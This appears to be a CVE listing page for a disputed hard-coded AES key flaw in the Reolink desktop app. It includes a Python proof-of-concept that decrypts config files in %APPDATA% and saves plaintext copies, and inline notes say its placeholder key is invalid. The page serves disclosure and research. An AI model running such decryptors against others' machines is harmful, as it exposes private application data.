Security Vulnerability Report
CVE-2025-56802 CVSS 5.1 MEDIUM

CVE-2025-56802

Published: 2025-10-21 19:21:23
Last Modified: 2025-11-17 16:04:33

Description

The Reolink desktop application uses a hard-coded and predictable AES encryption key to encrypt user configuration files allowing attackers with local access to decrypt sensitive application data stored in %APPDATA%. A different vulnerability than CVE-2025-56801. NOTE: the Supplier's position is that material is not hardcoded and is instead randomly generated on each installation of the application.

CVSS Details

CVSS Score
5.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:reolink:reolink:8.18.12:*:*:*:desktop:*:*:* - VULNERABLE
Reolink Desktop Application: all versions that use the hard-coded AES key

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
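#!/usr/bin/env python3
# CVE-2025-56802 - Reolink Desktop Application Hardcoded AES Key PoC
# Author: shinyColumn
# Description: Decrypts Reolink configuration files encrypted with a
#              hardcoded/predictable AES key
#
# NOTE(review): the CVE record carries the "disputed" tag. The supplier's
# position is that the key material is not hard-coded and is generated
# randomly on each installation. Whether one key is shared by every install
# is therefore the open question; this listing does not settle it.

import os
import sys
from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad
import base64
import json

# Key value as published in this listing. The listing describes it as embedded
# in the application binary and shared by all installations; the supplier
# disputes that (see the note above).
# NOTE(review): the literal is 19 bytes long, not 16, so it is not a valid AES
# key of any size and AES.new() rejects it with ValueError. It looks like a
# placeholder rather than recovered key material, so the script as published
# cannot decrypt anything.
HARDCODED_AES_KEY = b'reolink_default_key'

# Key lengths (in bytes) that AES accepts: AES-128, AES-192, AES-256.
_VALID_AES_KEY_LENGTHS = (16, 24, 32)

# File suffixes treated as candidate encrypted files. This is a heuristic:
# nothing on the page confirms which files the application encrypts.
_CANDIDATE_SUFFIXES = ('.dat', '.cfg', '.enc', '.bin', '.db')


def find_reolink_config_path():
    """Locate the Reolink configuration directory in %APPDATA%.

    Returns:
        The first candidate directory that exists, or None when APPDATA is
        unset or no candidate is present.
    """
    appdata = os.environ.get('APPDATA')
    if not appdata:
        print("[!] APPDATA environment variable not found")
        return None

    # Common Reolink config paths (guesses; checked in this order)
    possible_paths = [
        os.path.join(appdata, 'Reolink', 'Client'),
        os.path.join(appdata, 'Reolink'),
        os.path.join(appdata, 'ReolinkClient'),
    ]

    for path in possible_paths:
        if os.path.exists(path):
            print(f"[+] Found Reolink config directory: {path}")
            return path

    print("[!] Reolink config directory not found")
    return None


def decrypt_config_file(encrypted_file_path, key):
    """Decrypt one file as AES-CBC with the IV stored in its first 16 bytes.

    The layout (IV followed by ciphertext, PKCS#7 padding) is an assumption of
    this listing; the page gives no evidence for the real file format.

    Args:
        encrypted_file_path: Path of the file to read.
        key: AES key as bytes (16, 24 or 32 bytes).

    Returns:
        The unpadded plaintext as bytes, or None when the file cannot be read,
        is shorter than one IV, or does not decrypt to valid padding.
    """
    try:
        with open(encrypted_file_path, 'rb') as f:
            encrypted_data = f.read()

        # Extract IV (first 16 bytes) and ciphertext
        if len(encrypted_data) < 16:
            print(f"[!] File too small: {encrypted_file_path}")
            return None

        iv = encrypted_data[:16]
        ciphertext = encrypted_data[16:]

        # CBC carries no authentication. Valid padding after decryption is the
        # only success signal here, and a wrong key can produce valid padding
        # by chance, so a non-None result is not proof that the key is right.
        cipher = AES.new(key, AES.MODE_CBC, iv)
        return unpad(cipher.decrypt(ciphertext), AES.block_size)
    except (OSError, ValueError) as e:
        # OSError: unreadable file. ValueError: bad key length, ciphertext not
        # a multiple of the block size, or invalid padding.
        print(f"[!] Decryption failed for {encrypted_file_path}: {e}")
        return None


def main():
    """Find the config directory, then try to decrypt each candidate file."""
    print("=" * 60)
    print("CVE-2025-56802 - Reolink Config Decryptor PoC")
    print("=" * 60)

    # Fail once, with the real cause, instead of reporting a separate
    # "decryption failed" line for every file when the key cannot be used.
    if len(HARDCODED_AES_KEY) not in _VALID_AES_KEY_LENGTHS:
        print(f"[!] HARDCODED_AES_KEY is {len(HARDCODED_AES_KEY)} bytes; "
              "AES requires 16, 24 or 32")
        sys.exit(1)

    # Step 1: Find the Reolink configuration directory
    config_dir = find_reolink_config_path()
    if not config_dir:
        sys.exit(1)

    # Step 2: List encrypted configuration files
    config_files = [
        os.path.join(root, name)
        for root, _dirs, files in os.walk(config_dir)
        for name in files
        if name.endswith(_CANDIDATE_SUFFIXES)
    ]

    if not config_files:
        print("[!] No encrypted configuration files found")
        sys.exit(1)

    print(f"[+] Found {len(config_files)} encrypted file(s)")

    # Step 3: Decrypt each configuration file
    for file_path in config_files:
        print(f"\n[*] Decrypting: {file_path}")
        decrypted_data = decrypt_config_file(file_path, HARDCODED_AES_KEY)

        # None means failure; an empty plaintext is still a result.
        if decrypted_data is None:
            continue

        # Save decrypted content.
        # NOTE(review): this leaves a plaintext copy next to the ciphertext
        # under the user's profile; delete it once the analysis is done.
        output_path = file_path + '.decrypted'
        with open(output_path, 'wb') as f:
            f.write(decrypted_data)
        print(f"[+] Decrypted content saved to: {output_path}")

        # Try to display as text/JSON
        try:
            text_content = decrypted_data.decode('utf-8')
            print(f"[+] Content:\n{text_content[:500]}")
        except UnicodeDecodeError:
            print(f"[+] Binary content (first 100 bytes): {decrypted_data[:100]}")


if __name__ == '__main__':
    main()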

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-56802", "sourceIdentifier": "[email protected]", "published": "2025-10-21T19:21:23.007", "lastModified": "2025-11-17T16:04:32.880", "vulnStatus": "Analyzed", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["disputed"]}], "descriptions": [{"lang": "en", "value": "The Reolink desktop application uses a hard-coded and predictable AES encryption key to encrypt user configuration files allowing attackers with local access to decrypt sensitive application data stored in %APPDATA%. A different vulnerability than CVE-2025-56801. NOTE: the Supplier's position is that material is not hardcoded and is instead randomly generated on each installation of the application."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.5, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-321"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:reolink:reolink:8.18.12:*:*:*:desktop:*:*:*", "matchCriteriaId": "30EFCAEB-546D-449F-A08D-360DFF9CE745"}]}]}], "references": [{"url": "https://github.com/shinyColumn/CVE-2025-56802", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://shinycolumn.notion.site/reolink-aes-key", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}